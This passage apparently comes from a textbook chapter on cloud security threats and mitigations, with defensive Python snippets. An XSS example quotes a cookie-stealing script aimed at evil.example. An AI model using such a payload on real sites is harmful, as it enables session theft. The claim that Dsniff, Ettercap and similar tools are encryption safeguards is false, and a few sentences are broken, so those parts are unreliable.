tenancy and isolation, giving customers more comfort beyond the “trust us” idea
of clouds. Survey works have been reported which classify security
threats in cloud based on the nature of the service delivery models (SaaS,
PaaS, IaaS) of a cloud computing system. However, security requires a holistic
approach. Service delivery model is one of many aspects that need to be
considered for a comprehensive survey on cloud security. Security at different
levels such as Network level, Host level and Application level is necessary to
keep the cloud up and running continuously. In accordance with these different
levels, various types of security breaches may occur which have been
classified in this section.

 Data Threats including data breaches and data loss


 Network Threats including account or service hijacking, and
denial of service, and
 Cloud Environment Specific Threats including insecure
interfaces and APIs, malicious insiders, abuse of cloud services,
insufficient due diligence, and shared technology vulnerabilities

7.3.1 Data Threats

Data is considered to be one of the most valuable resources of any


organization and the number of customers shifting their data to cloud is
increasing every day. Data life cycle in cloud comprises of data creation,
transit, execution, storage and destruction. Data may be created in client or
server in cloud, transferred in cloud through network and stored in cloud
storage. When required data is shifted to execution environment where it can
be processed. Data can be deleted by its owner to complete its destruction. The
biggest challenge in achieving cloud computing security is to keep data secure.
The major issues that arise with the transfer of data to cloud are that the
customers don’t have the visibility of their data and neither do they know its
location. They need to depend on the service provider to ensure that the
platform is secure, and it implements necessary security properties to keep
their data safe. The data security properties that must be maintained in cloud
are confidentiality, integrity, authorization, availability and privacy. However,
many data issues arise due to improper handling of data by the cloud provider.
The major data security threats include data breaches, data loss, unauthorized
access, and integrity violations. All of these issues occur frequently on cloud
data.

7.3.1.1 Data Breaches

Data breach is defined as the leakage of sensitive customer or organization


data to unauthorized user. Data breach from organization can have a huge
impact on its business regarding finance, trust and loss of customers. This may
happen accidently due to flaws in infrastructure, application designing,
operational issues, insufficiency of authentication, authorization, and audit
controls. Moreover, it can also occur due to other reasons such as the attacks
by malicious users who have a virtual machine (VM) on the same physical
system as the one they want to access in unauthorized way. In recent past,
Apple’s iCloud users faced a data leakage attack recently in which an attempt
was made to gain access to their private data. Such attacks have also been done
at other companies cloud such as Microsoft, Yahoo and Google. An example
of data breach is cross VM side channel attack that extracts cryptographic keys
of other VMs on the same system and can access their data.

7.3.1.2 Data Loss

Data loss is the second most important issue related to cloud security. Like
data breach, data loss is a sensitive matter for any organization and can have a
devastating effect on its business. Data loss mostly occurs due to malicious
attackers, data deletion, data corruption, loss of data encryption key, faults in
storage system, or natural disasters. In 2013, 44% of cloud service providers
have faced brute force attacks that resulted in data loss and data leakage.
Similarly, malware attacks have also been targeted at cloud applications
resulting in data destruction.

7.3.1.3 SQL Injection Attacks

SQL injection attacks are the ones in which a malicious code is inserted into a
standard SQL code. Thus the attackers gain unauthorized access to a database
and are able to access sensitive information. Sometimes the attacker's input is
mistaken by the website for legitimate user data and is passed on to the SQL
server, and this lets the attacker learn about the functioning of the website
and make changes to it. Various techniques
like: avoiding the usage of dynamically generated SQL in the code, using
filtering techniques to sanitize the user input etc. are used to check the SQL
injection attacks. Some researchers proposed proxy based architecture towards
preventing SQL Injection attacks which dynamically detects and extracts
users’ inputs for suspected SQL control sequences.
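The "avoid dynamically generated SQL" advice above essentially amounts to using parameterized queries. A minimal sketch with the standard-library sqlite3 module (the table and values are made up for illustration):

    # Parameterized query: the driver treats user input strictly as data,
    # so input like "x' OR '1'='1" cannot change the structure of the SQL.
    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

    user_input = "alice' OR '1'='1"   # a typical injection attempt

    # Safe: placeholder plus a parameter tuple instead of string concatenation.
    rows = conn.execute(
        "SELECT secret FROM users WHERE name = ?", (user_input,)
    ).fetchall()
    print(rows)   # [] — the malicious string matched nothing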

7.3.1.4 Cross Site Scripting(XSS) Attacks


Cross Site Scripting (XSS) attacks, which inject malicious scripts into Web
contents have become quite popular since the inception of Web 2.0. There are
two methods for injecting the malicious code into the web-page displayed to
the user namely - Stored XSS and Reflected XSS. In a Stored XSS, the
malicious code is permanently stored into a resource managed by the web
application and the actual attack is carried out when the victim requests a
dynamic page that is constructed from the contents of this resource. However,
in case of a Reflected XSS, the attack script is not permanently stored; in fact it
is immediately reflected back to the user.
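Whichever variant is used, the standard server-side defence is to escape untrusted input before it is written into a page, so that injected markup is rendered as inert text. A minimal sketch with the Python standard library:

    # Output encoding: HTML-escape untrusted input before embedding it in a page.
    import html

    untrusted = '<script>document.location="http://evil.example/?c=" + document.cookie</script>'

    safe_fragment = html.escape(untrusted)
    page = f"<p>Your comment: {safe_fragment}</p>"
    print(page)
    # The <script> tag is now &lt;script&gt;... and will not execute in the browser.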

7.3.2 Network Threats

Network plays an important part in deciding how efficiently the cloud services
operate and communicate with users. In developing most cloud solutions,
network security is not considered as an important factor by some
organizations. Not having enough network security creates attacks vectors for
the malicious users and outsiders resulting in different network threats. Most
critical network threats in cloud are account or service hijacking, and denial of
service attacks.

7.3.2.1 Denial of Service(DoS)

Denial of Service (DOS) attacks are carried out to prevent legitimate users from
accessing cloud network, storage, data, and other services. DOS attacks have
been on the rise in cloud computing in the past few years and 81% of customers
consider them a significant threat in cloud.
service that can be used to consume most cloud resources such as computation
power, memory, and network bandwidth. This causes a delay in cloud
operations, and sometimes cloud is unable to respond to other users and
services. Distributed Denial of Service (DDOS) attack is a form of DOS
attacks in which multiple network sources are used by the attacker to send a
large number of requests to the cloud for consuming its resources. It can be
launched by exploiting the vulnerabilities in web server, databases, and
applications resulting in unavailability of resources.

7.3.2.2 Account or Service Hijacking

Account hijacking involves the stealing of user credentials to get an access to


his account, data or other computing services. These stolen credentials can be
used to access and compromise cloud services. Network attacks such as
phishing, fraud, Cross Site Scripting (XSS), botnets and software
vulnerabilities such as buffer overflow can result in account or service hijacking.
This can lead to the compromise of user privacy as the attacker can eavesdrop
on all his operations, modify data, and redirect his network traffic.

7.3.2.3 Man in the Middle Attack (MITM)

In such an attack, an entity tries to intrude in an ongoing conversation between


a sender and a client to inject false information and to have knowledge of the
important data transferred between them. Various tools implementing strong
encryption technologies like: Dsniff, Cain, Ettercap, Wsniff, Airjack etc. have
been developed in order to provide safeguard against them.

Another cause may be improper configuration of the Secure Socket Layer
(SSL). For example, if SSL is improperly configured, a middle party
could intercept the data. The preventive measure for this attack is to properly
configure SSL before communicating with other parties.
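In Python, "properly configured" TLS usually means using a default context that actually verifies the server certificate and hostname rather than disabling those checks, roughly as sketched below (the host name is only an example):

    # A TLS client that verifies the peer, which is the basic defence against
    # man-in-the-middle interception.
    import socket
    import ssl

    context = ssl.create_default_context()          # loads trusted CA certificates
    context.check_hostname = True                   # default, shown for emphasis
    context.verify_mode = ssl.CERT_REQUIRED         # refuse unverified peers

    with socket.create_connection(("example.com", 443)) as raw:
        with context.wrap_socket(raw, server_hostname="example.com") as tls:
            print("Negotiated", tls.version(), "with", tls.getpeercert()["subject"])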

7.3.2.4 Network Sniffing

Network sniffing is an issue in which plain text is captured over the network. An
intruder could sniff passwords that were improperly encrypted during
communication. If encryption techniques are not used to secure the data, an
attacker could enter as a third party and seize it. Strong encryption methods
should therefore be deployed to secure data in transit.

7.3.2.5 Port Scanning

Port scanning is an issue in which an attack may happen because port 80 (HTTP)
is always kept open for provisioning web services. Other ports, like 21 (FTP),
etc., are opened only when needed. A firewall is the counter measure used to
protect the data from port-based attacks.

7.3.2.6 Compromised Credentials and Broken Authentication

Authentication management is always a challenge for organizations to tackle


and solve to close loopholes and prevent attackers from accessing permissions.

Brute Force Attacks: The attacker attempts to crack the password by guessing
all potential passwords.

Shoulder Surfing: This threat is espionage, which means the attacker is


watching and spying on the user’s motions in attempt to know the passwords.

Replay Attacks: Also known as reflection attacks, replay attacks are a type of
attack that targets a user’s authentication process.

Key loggers: This is a program that records every key pressed by the user and
tracks their behavior.
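One standard server-side mitigation against brute-force attacks on stolen credential databases is to store only salted, deliberately slow password hashes. A minimal standard-library sketch (the passwords and iteration count are illustrative):

    # Salted, iterated password hashing: brute forcing each guess now costs
    # hundreds of thousands of hash iterations instead of one.
    import hashlib
    import hmac
    import os

    def hash_password(password: str, salt: bytes | None = None):
        salt = salt or os.urandom(16)
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
        return salt, digest

    def check_password(password: str, salt: bytes, expected: bytes) -> bool:
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
        return hmac.compare_digest(candidate, expected)

    salt, stored = hash_password("correct horse battery staple")
    print(check_password("correct horse battery staple", salt, stored))  # True
    print(check_password("123456", salt, stored))                        # False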

7.3.2.7 Border Gateway Protocol (BGP) Prefix Hijacking

Prefix hijacking is a type of network attack in which a wrong announcement


related to the IP addresses associated with an Autonomous system (AS) is
made. Hence, malicious parties get access to the untraceable IP addresses. On
the internet, IP space is associated in blocks and remains under the control of
ASs. An autonomous system can broadcast information of an IP contained in
its regime to all its neighbours. These ASs communicate using the Border
Gateway Protocol (BGP) model. Sometimes, due to some error, a faulty AS
may broadcast wrongly about the IPs associated with it. In such case, the actual
traffic gets routed to some IP other than the intended one. Hence, data is leaked
or reaches to some other unintended destination.

7.3.2.8 Distributed Denial of Service Attacks (DDoS)

DDoS may be called an advanced version of DoS in terms of denying the


important services running on a server by flooding the destination sever with
large numbers of packets such that the target server is not able to handle it. In
DDoS the attack is relayed from different dynamic networks which have
already been compromised unlike the DoS attack. The attackers have the
power to control the flow of information by allowing some information
available at certain times. Thus the amount and type of information available
for public usage is clearly under the control of the attacker [87]. The DDoS
attack is run by three functional units: A Master, A Slave and A Victim.
Master being the attack launcher is behind all these attacks causing DDoS,
Slave is the network which acts like a launch pad for the Master. It provides
the platform to the Master to launch the attack on the Victim. Hence it is also
called as co-ordinated attack. Basically a DDoS attack is operational in two
stages: the first one being Intrusion phase where the Master tries to
compromise less important machines to support in flooding the more important
one. The next one is installing DDoS tools and attacking the victim server or
machine. Hence, a DDoS attack results in making the service unavailable to
the authorized user similar to the way it is done in a DoS attack but different in
the way it is launched. A similar case of Distributed Denial of Service attack
was experienced with CNN news channel website leaving most of its users
unable to access the site for a period of three hours. In general, the approaches
used to fight the DDoS attack involve extensive modification of the underlying
network. These modifications often become costly for the users. Swarm based
logic for guarding against the DDoS attack were provided. This logic provides
a transparent transport layer, through which the common protocols such as
HTTP, SMTP, etc. can pass easily. The use of IDS in the virtual machine is
proposed to protect the cloud from DDoS attacks. A SNORT like intrusion
detection mechanism is loaded onto the virtual machine for sniffing all traffics,
either incoming, or outgoing. Another method commonly used to guard against
DDoS is to have intrusion detection systems on all the physical machines
which contain the user’s virtual machines.

7.3.3 Cloud Environment Specific Threats

Cloud service providers are largely responsible for controlling the cloud
environment. Some threats are specific to cloud computing such as cloud
service provider issues, providing insecure interfaces and APIs to users,
malicious cloud users, shared technology vulnerabilities, misuse of cloud
services, and insufficient due diligence by companies before moving to cloud.

7.3.3.1 Insecure Interfaces and API’s

Application Programming Interface (API) is a set of protocols and standards


that define the communication between software applications through Internet.
Cloud APIs are used at all the infrastructure, platform and software service
levels to communicate with other services. Infrastructure as a Service (IaaS)
APIs are used to access and manage infrastructure resources including network
and VMs, Platform as a Service (PaaS) APIs provide access to the cloud
services such as storage and Software as a Service (SaaS) APIs connect
software applications with the cloud infrastructure. The security of various
cloud services depends on the APIs security. Weak set of APIs and interfaces
can result in many security issues in cloud. Cloud providers generally offer
their APIs to third party to give services to customers. However, weak APIs
can lead to the third party having access to security keys and critical
information in cloud. With the security keys, the encrypted customer data in
cloud can be read resulting in loss of data integrity, confidentiality and
availability. Moreover, authentication and access control principles can also be
violated through insecure APIs.

7.3.3.2 Malicious Insiders

A malicious insider is someone who is an employee in the cloud organization,


or a business partner with an access to cloud network, applications, services, or
data, and misuses his access to do unprivileged activities. Cloud administrators
are responsible for managing, governing, and maintaining the complete
environment. They have access to most data and resources, and might end up
using their access to leak that data. Other categories of malicious insiders
involve hobbyist hackers who are administrators that want to get unauthorized
sensitive information just for fun, and corporate espionage that involves
stealing secret information of business for corporate purposes that might be
sponsored by national governments.

7.3.3.3 Abuse of Cloud Services

The term abuse of cloud services refers to the misuse of cloud services by the
consumers. It is mostly used to describe the actions of cloud users that are
illegal, unethical, or violate their contract with the service provider. In 2010,
abusing of cloud services was considered to be the most critical cloud threat
and different measures were taken to prevent it. However, 84% of cloud users
still consider it as a relevant threat. Research has shown that some cloud
providers are unable to detect attacks launched from their networks, due to
which they are unable to generate alerts or block any attacks. The abuse of
cloud services is a more serious threat to the service provider than service
users. For instance, the use of cloud network addresses for spam by malicious
users has resulted in blacklisting of all network addresses, thus the service
provider must ensure all possible measures for preventing these threats. Over
the years, different attacks have been launched through cloud by the malicious
users. For example, Amazon’s EC2 services were used as a command and
control servers to launch the Zeus botnet in 2009. Famous cloud services such as
Twitter, Google and Facebook have also been used as command and control servers for
launching Trojans and botnets. Other attacks that have been launched using cloud are
brute force for password cracking of encryption, phishing, performing DOS
attack against a web service at specific host, Cross Site Scripting and SQL
injection attacks.

7.3.3.4 Insufficient Due Diligence

The term due diligence refers to individuals or customers having the complete
information for assessments of risks associate with a business prior to using its
services. Cloud computing offers exciting opportunities of unlimited
computing resources, and fast access due which number of businesses shift to
cloud without assessing the risks associated with it. Due to the complex
architecture of cloud, some of organization security policies cannot be applied
using cloud. Moreover, the cloud customers have no idea about the internal
security procedures, auditing, logging, data storage, data access which results
in creating unknown risk profiles in cloud. In some cases, the developers and
designers of applications maybe unaware of their effects from deployment on
cloud that can result in operational and architectural issues.
7.3.3.5 Shared Technology Vulnerabilities

Cloud computing offers the provisioning of services by sharing of


infrastructure, platform and software. However, different components such as
CPUs, and GPUs may not offer cloud security requirements such as perfect
isolation. Moreover, some applications may be designed without using trusted
computing practices due to which threats of shared technology arise that can be
exploited in multiple ways. In recent years, shared technology vulnerabilities
have been used by attackers to launch attacks on cloud. One such attack is
gaining access to the hypervisor to run malicious code, get unauthorized access
to the cloud resources, VMs, and customer’s data. Xen platform is an open
source solution used to offer cloud services.

Earlier versions of the Xen hypervisor code contained a local privilege escalation (in which
a user can gain the rights of another user) vulnerability that could be used to launch a guest-to-
host VM escape attack. Later, Xen updated the code base of its hypervisor to
fix that vulnerability. Other companies such as Microsoft, Oracle and SUSE
Linux those based on Xen also released updates of their software to fix the
local privilege escalation vulnerability. Similarly, a report released in 2009,
showed the usage of VMware to run code from guests to hosts showing the
possible ways to launch attacks.

7.3.3.6 Inadequate Change Control and Misconfiguration

If an asset is set up wrong, it may suffer from misconfiguration, making it


exposed to attacks. Misconfiguration has now become a major source of data
leaks and unwarranted resource modification. The lack of adequate change
control may be a prevalent cause of misconfiguration. Depending on the nature
of the misconfiguration and how soon it is recognized and remedied, a
misconfigured item might have a significant business impact. Storage objects
left unsecured, unmodified default passwords and default settings, and
removing basic security safeguards are all examples of misconfiguration.

7.3.3.7 Limited Cloud Usage Visibility

Limited cloud usage visibility means when an organization is unable to


determine whether a service running on its platform is secure or harmful.
Unsanctioned app use and sanctioned app misuse are the two most common
categories. When users use apps and services without permission, the former
occurs. Authorized users utilize a sanctioned application in the latter case. This
could result in unauthorized data access and the entry of malware into the
system.

7.3.3.8 Loss of Operational and Security Logs

The lack of operational logs makes evaluating operational variables difficult.


When data is unavailable for analysis, the options for resolving difficulties are
limited. The loss of security logs poses a threat to the security management
program’s application management

7.3.3.9 Failure of Isolation

There is a lack of strong isolation or compartmentalization of routing,
reputation, storage, and memory among tenants. Because of the lack of
isolation, attackers attempt to take control of the operations of other cloud
users to obtain unauthorized access to the data.

7.3.3.10 Risks of Noncompliance

Organizations seeking compliance with standards and legislation may be at


danger if the Cloud Service Provider cannot ensure adherence of the
requirements, outsources cloud administration to third parties, and/or refuses to
allow client audits. This danger arises from a lack of oversight over audits and
industry standard evaluation. As a result, cloud platform users are unaware of
provider protocols and practices in the areas of identity management, access,
and separation of roles.

7.3.3.11 Attacks against Cryptography

Cloud services are vulnerable to cryptanalysis due to insecure or outdated


encryption. If criminal users take control of the cloud, data stored there may be
encoded to prevent it from being read. Although fundamental errors in the
design of cryptographic algorithms which may cause suitable encryption
algorithms to become weak, there are also unique ways to break cryptography.
By evaluating accessible places and tracking clients’ query access habits,
incomplete information can be extracted from encrypted data.

7.3.3.12 Attacks through a Backdoor Channel

Through this approach, attackers can gain access to remote system applications
on the victim's resource systems. It is a passive attack of sorts. Zombies are
sometimes used by attackers to carry out DDoS attacks; backdoor channels,
however, are frequently used by attackers to gain control of the victim's
resources. This can compromise data security and privacy.

7.4 SECURITY ISSUES IN CLOUD DEPLOYMENT MODELS

Each of the three ways (Public, Private, Hybrid) in which cloud services can
be deployed has its own advantages and limitations. And from the security
perspective, all the three have got certain areas that need to be addressed with a
specific strategy to avoid them.

7.4.1 Security Issues in a Public Cloud

In a public cloud, many customers coexist on a shared platform and
infrastructure security is provided by the service provider. A few of the key
security issues in a public cloud include:

 The three basic requirements of security (confidentiality, integrity and
availability) are required to protect data throughout its lifecycle. Data
must be protected during the various stages of creation, sharing,
archiving, processing etc. However, the situation becomes more
complicated in the case of a public cloud, where we do not have any control
over the service provider's security practices.
 In a public cloud, the same infrastructure is shared between
multiple tenants and the chances of data leakage between these tenants
are very high. Most of the service providers run a multitenant
infrastructure, so proper investigation at the time of choosing the service
provider must be done in order to avoid any such risk.
 In case a Cloud Service Provider uses a third-party vendor to provide its
cloud services, it should be ascertained what service level agreements they
have between them, as well as what the contingency plans are in case of
the breakdown of the third-party system.
 Proper SLAs should be in place, defining the security requirements such as
what level of encryption data should undergo when it is sent over the
internet, and what the penalties are in case the service provider fails to do so.

Although data is stored outside the confines of the client organization in a
public cloud, we cannot deny the possibility of an insider attack originating
from the service provider's end. Moving the data to a cloud computing
environment expands the circle of insiders to the service provider's staff and
subcontractors. Policy enforcement implemented at the nodes and the data
centres can prevent a system administrator from carrying out any malicious
action. The three major steps to achieve this are: defining a policy, propagating
the policy by means of a secure policy propagation module and enforcing it
through a policy enforcement module.

7.4.2 Security Issues in a Private Cloud

A private cloud model enables the customer to have total control over the
network and provides the flexibility to the customer to implement any
traditional network perimeter security practice. Although the security
architecture is more reliable in a private cloud, there are still issues/risks that
need to be considered:

 Virtualization techniques are quite popular in private clouds. In such a
scenario, risks to the hypervisor should be carefully analyzed. There
have been instances when a guest operating system has been able to run
processes on other guest VMs or on the host. In a virtual environment it
may happen that virtual machines are able to communicate with all the
VMs, including the ones with which they are not supposed to
communicate. To ensure that they communicate only with the intended
ones, proper authentication and encryption techniques such as IPsec
(IP-level security) should be implemented.
 The host operating system should be free from any sort of malware
threat and monitored to avoid any such risk. In addition, guest virtual
machines should not be able to communicate with the host operating
system directly. There should be dedicated physical interfaces for
communicating with the host.
 In a private cloud, users are facilitated with an option to manage
portions of the cloud, and access to the infrastructure is provided
through a web interface or an HTTP end point. There are two ways of
implementing a web interface: either by writing a whole application
stack, or by using a standard applicative stack to develop the web
interface using common languages such as Java, PHP, Python etc. As
part of a screening process, the Eucalyptus web interface was found to
have a bug allowing any user to perform internal port scanning or
HTTP requests through the management node, which he should not be
allowed to do. In a nutshell, interfaces need to be properly developed
and standard web application security techniques need to be deployed
to protect the diverse HTTP requests being performed.
 While we talk of standard internet security, we also need to have a
security policy in place to safeguard the system from attacks
originating within the organization. This vital point is missed on most
occasions, the stress being mostly upon internet security. Proper
security guidelines should exist across the various departments and
controls should be implemented as per the requirements.

Thus we see that although private clouds are considered safer in comparison to
public clouds, they still have multiple issues which, if unattended, may lead to
major security loopholes, as discussed earlier.

7.4.3 Security Issues in a Hybrid Cloud

The hybrid cloud model is a combination of both public and private cloud and
hence the security issues discussed with respect to both are applicable in case
of hybrid cloud.

In the following section the security methods to avoid the exploitation of the
threats will be discussed.

7.5 ENSURING SECURITY IN CLOUD AGAINST VARIOUS TYPES OF ATTACKS

This section describes the implementation of various security techniques at
different levels to secure the cloud from the above-said threats.

7.5.1 Protection from Data Breaches

Various security measures and techniques have been proposed to avoid data
breaches in the cloud. One of these is to encrypt data before storage on the
cloud and in the network. This requires an efficient key management algorithm
and the protection of the key in the cloud. Some measures that must be taken to
avoid data breaches in the cloud are to implement proper isolation among VMs
to prevent information leakage, to implement proper access controls to prevent
unauthorized access, and to carry out a risk assessment of the cloud environment
to know where sensitive data is stored and how it is transmitted between various
services and networks.
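As a minimal sketch of the first measure, the following Python fragment encrypts data locally before it is handed to any cloud storage API. It assumes the third-party "cryptography" package is installed; the upload step is only a placeholder, not a call to any particular provider's API.

# Sketch: encrypt data locally before sending it to cloud storage.
# Assumes the third-party "cryptography" package (pip install cryptography);
# the upload step is a placeholder, not a real cloud API call.
from cryptography.fernet import Fernet

def encrypt_for_cloud(plaintext: bytes, key: bytes) -> bytes:
    """Return ciphertext that is safe to hand to an untrusted store."""
    return Fernet(key).encrypt(plaintext)

def decrypt_from_cloud(ciphertext: bytes, key: bytes) -> bytes:
    """Recover the original data; fails if the ciphertext was tampered with."""
    return Fernet(key).decrypt(ciphertext)

if __name__ == "__main__":
    key = Fernet.generate_key()            # keep this key out of the cloud
    secret = b"customer records ..."
    blob = encrypt_for_cloud(secret, key)
    # upload(blob) would go here; the provider only ever sees ciphertext
    assert decrypt_from_cloud(blob, key) == secret

Because the key never leaves the client, this pattern also illustrates why key management and key protection are singled out in the paragraph above.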

Many researchers have worked on the protection of data in cloud storage.
CloudProof is a system that can be built on top of existing cloud storages like
Amazon S3 and Azure to ensure data integrity and confidentiality using
encryption. To secure data in cloud storage, attribute-based encryption can be
used to encrypt data with a specific access control policy before storage.
Therefore, only the users with the required access attributes and keys can access
the data.

Another technique to protect data in the cloud involves using scalable and
fine-grained data access control. In this scheme, access policies are defined based
on the data attributes. Moreover, to overcome the computational overhead
caused by fine-grained access control, most computation tasks can be handed
over to an untrusted commodity cloud without disclosing the data contents. This
is achieved by combining techniques of attribute-based encryption, proxy
re-encryption, and lazy re-encryption.

7.5.2 Protection from Data Loss

To prevent data loss in cloud different security measures can be adopted. One
of the most important measures is to maintain backup of all data in cloud
which can be accessed in case of data loss. However, data backup must also be
protected to maintain the security properties of data such as integrity and
confidentiality. Various data loss prevention (DLP) mechanisms have been
proposed for the prevention of data loss in network, processing, and storage.
Many companies including Symantec, McAfee, and Cisco have also developed
solutions to implement data loss prevention across storage systems, networks
and end points. Trusted Computing can be used to provide data security. A
trusted server can monitor the functions performed on data by cloud server and
provide the complete audit report to data owner. In this way, the data owner
can be sure that the data access policies have not been violated.
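A small illustration of the backup idea, using only the Python standard library, is given below: a file is copied to a backup location and a SHA-256 digest is recorded so that the copy's integrity can be verified later. The file and directory names are hypothetical.

# Sketch of a backup with an integrity check, standard library only.
# File and directory names are hypothetical placeholders.
import hashlib
import shutil
from pathlib import Path

def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def backup_with_digest(source: Path, backup_dir: Path) -> str:
    backup_dir.mkdir(parents=True, exist_ok=True)
    target = backup_dir / source.name
    shutil.copy2(source, target)      # copy data and metadata
    return sha256_of(target)          # store this digest separately from the backup

def verify_backup(backup: Path, expected_digest: str) -> bool:
    return sha256_of(backup) == expected_digest

Keeping the digest apart from the backup itself is what allows the data owner, rather than the storage provider, to confirm that integrity has been preserved.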

In a nutshell, organizations should apply the following mitigation techniques to
protect against this type of threat:

 Provide data-storage and backup mechanisms.
 Use proper encryption techniques.
 Protect in-transit data.
 Generate strong keys and implement advanced storage and management.
 Legally require suppliers to use reinforcement and maintenance techniques.

7.5.3 Protection from Account or Service Hijacking

Account or service hijacking can be avoided by adopting different security
features on the cloud network. These include employing intrusion detection
systems (IDS) in the cloud to monitor network traffic and nodes for detecting
malicious activities. Intrusion detection and other network security systems
must be designed by considering cloud efficiency, compatibility and the
virtualization-based context. One IDS system for the cloud was designed by
combining system-level virtualization and virtual machine monitor
(responsible for managing VMs) techniques. In this architecture, the IDSs are
based on VMs and the sensors are based on Snort, which is a well-known IDS.
VM status and workload are monitored by the IDS, and the VMs can be started,
stopped and recovered at any time by the IDS management system. Identity and
access management should also be implemented properly to prevent access to
credentials. To avoid account hijacking threats, multi-factor authentication for
remote access using at least two credentials can be used. One technique uses
multi-level authentication through passwords to access the cloud services: first
the user is authenticated by the cloud access password, and at the next level the
service access password of the user is verified. Moreover, user access to cloud
services and applications should be approved by cloud management. The
auditing of all the privileged activities of the user, along with the information
security events generated from them, should also be done to avoid these threats.

In a nutshell, organizations should apply the following mitigation techniques to
protect against this type of threat:

 Appropriate understanding of security policies and SLAs.


 A strong multifactor authentication to provide an extra security check
for the identification of genuine customers and make the cloud
environment more secure and reliable.
 Strict and continuous monitoring to detect unauthorized activities.
 Prevention of credentials being shared among customers and services.

7.5.4 Protection from Denial of Service (DoS) Attacks

To avoid DoS attacks it is important to identify and implement all the basic
security requirements of the cloud network, applications, databases, and other
services. Applications should be tested after design to verify that they have
no loopholes that can be exploited by attackers. DDoS attacks can be
prevented by having extra network bandwidth, using IDSs that verify network
requests before they reach the cloud server, and maintaining a backup of IP
pools for urgent cases. Industrial solutions to prevent DDoS attacks have also
been provided by different vendors. A technique named hop-count filtering can
be used to filter spoofed IP packets, and helps in decreasing DoS attacks by
90%. Another technique for securing the cloud from DDoS involves using an
intrusion detection system in a virtual machine (VM). In this scheme, when an
intrusion detection system (IDS) detects an abnormal increase in inbound
traffic, the targeted applications are transferred to VMs hosted in another data
center.
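The hop-count filtering idea can be sketched as follows: the hop count of a packet is estimated from its TTL (initial TTLs are commonly 64, 128 or 255) and compared with the hop count previously learned for that source address; a mismatch suggests a spoofed packet. The table entry below is a made-up example, and this is only an illustration of the principle, not a production filter.

# Sketch of hop-count filtering for spoofed-packet detection.
# Assumes a previously learned table mapping source IPs to expected hop counts.
COMMON_INITIAL_TTLS = (64, 128, 255)

def hop_count(observed_ttl: int) -> int:
    """Estimate hops from the smallest common initial TTL >= observed TTL."""
    initial = min(t for t in COMMON_INITIAL_TTLS if t >= observed_ttl)
    return initial - observed_ttl

def looks_spoofed(src_ip: str, observed_ttl: int, learned: dict, slack: int = 1) -> bool:
    expected = learned.get(src_ip)
    if expected is None:
        return False                   # unknown source: cannot judge yet
    return abs(hop_count(observed_ttl) - expected) > slack

learned_hops = {"203.0.113.7": 12}     # example entry from the learning phase
print(looks_spoofed("203.0.113.7", 52, learned_hops))   # 64-52 = 12 hops -> False
print(looks_spoofed("203.0.113.7", 120, learned_hops))  # 128-120 = 8 hops -> True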

7.5.5 Protection from Insecure Interfaces and APIs

To protect the cloud from insecure API threats it is important for developers
to design these APIs by following the principles of trusted computing. Cloud
providers must also ensure that all the APIs implemented in the cloud are
designed securely, and check them before deployment for possible flaws.
Strong authentication mechanisms and access controls must also be
implemented to secure data and services from insecure interfaces and APIs.
The Open Web Application Security Project (OWASP) provides standards and
guidelines to develop secure applications that can help in avoiding such
application threats. Moreover, it is the responsibility of customers to analyze
the interfaces and APIs of the cloud provider before moving their data to the
cloud.
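A minimal sketch of the strong-authentication point for an API endpoint is shown below, using only the standard library. The request dictionary and the key store are simplified stand-ins for illustration; they are not part of any particular web framework or provider API.

# Minimal API-key check illustrating authenticated access to a cloud API.
# The "request" dict and the key store are simplified stand-ins.
import hashlib
import hmac

API_KEYS = {"client-42": hashlib.sha256(b"s3cr3t-key").hexdigest()}  # hashed keys only

def is_authenticated(request: dict) -> bool:
    client = request.get("client_id")
    presented = request.get("api_key", "")
    stored = API_KEYS.get(client)
    if stored is None:
        return False
    digest = hashlib.sha256(presented.encode()).hexdigest()
    return hmac.compare_digest(digest, stored)   # constant-time comparison

print(is_authenticated({"client_id": "client-42", "api_key": "s3cr3t-key"}))  # True
print(is_authenticated({"client_id": "client-42", "api_key": "guess"}))       # False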

In a nutshell, organizations should apply the following mitigation techniques to
protect against this type of insecure interface and API threat:

 Robust authentication and access control methods need to be adopted.


 There needs to be encryption of the transmitted data.
 Analysis of the cloud provider interfaces and a proper security model
for these interfaces.
 Detailed understanding of the dependency chain related to APIs.

7.5.6 Protection from Malicious Insiders

The protection from these threats can be achieved by limiting hardware and
infrastructure access to authorized personnel only. The service provider must
implement strong access control and segregation of duties in the management
layer, so that an administrator can access only the data and software he or she
is authorized for. Auditing of employees should also be implemented to check
for suspicious behavior. Moreover, employee behavior requirements should be
made part of the legal contract, and action should be taken against anyone
involved in malicious activities. To protect data from malicious insiders,
encryption can also be implemented in storage and on public networks.

In a nutshell, organizations should apply the following mitigation techniques to
protect against this type of threat:

 Apply human resource management as part of a legal agreement.


 Institute a compliance reporting system to help determine the security
breach notification so that appropriate action may be taken against a
person who has committed a fraud.
 Non-disclosure of the employees’ privileges and how they are
monitored.
 Conduct a comprehensive supplier assessment.
 Adopt transparency of information security and management practices.

7.5.7 Protection from Abuse of Cloud Services

The implementation of strict initial registration and validation processes can
help in identifying malicious consumers. The policies for the protection of the
organization's important assets must also be made part of the service level
agreement (SLA) between the user and the service provider. This familiarizes
the user with the possible legal actions that can be taken against him or her if
the agreement is violated. The Service Level Agreement definition language
(SLAng) provides features for SLA monitoring, enforcement and validation.
Moreover, network monitoring should be comprehensive enough to detect
malicious packets, and all updated security devices should be installed in the
network.

In a nutshell, organizations should apply the following mitigation techniques to
protect against this type of threat:

 Strong authorization and authentication mechanisms.


 Continuous examination of the network traffic.

7.5.8 Protection from Insufficient Due Diligence

It is important for organizations to fully understand the scope of the risks
associated with the cloud before shifting their business and critical assets such
as data to it. Service providers must disclose the applicable logs and
infrastructure, such as firewalls, to consumers so that they can take measures
for securing their applications and data. Moreover, the provider must set up
requirements for implementing cloud applications and services using industry
standards. The cloud provider should also perform risk assessment using
qualitative and quantitative methods at regular intervals to check the storage,
flow, and processing of data.

7.5.9 Protection from Shared Technology Vulnerabilities

In cloud architecture, the hypervisor is responsible for mediating interactions
between virtual machines and the physical hardware. Therefore, the hypervisor
must be secured to ensure the proper functioning of other virtualization
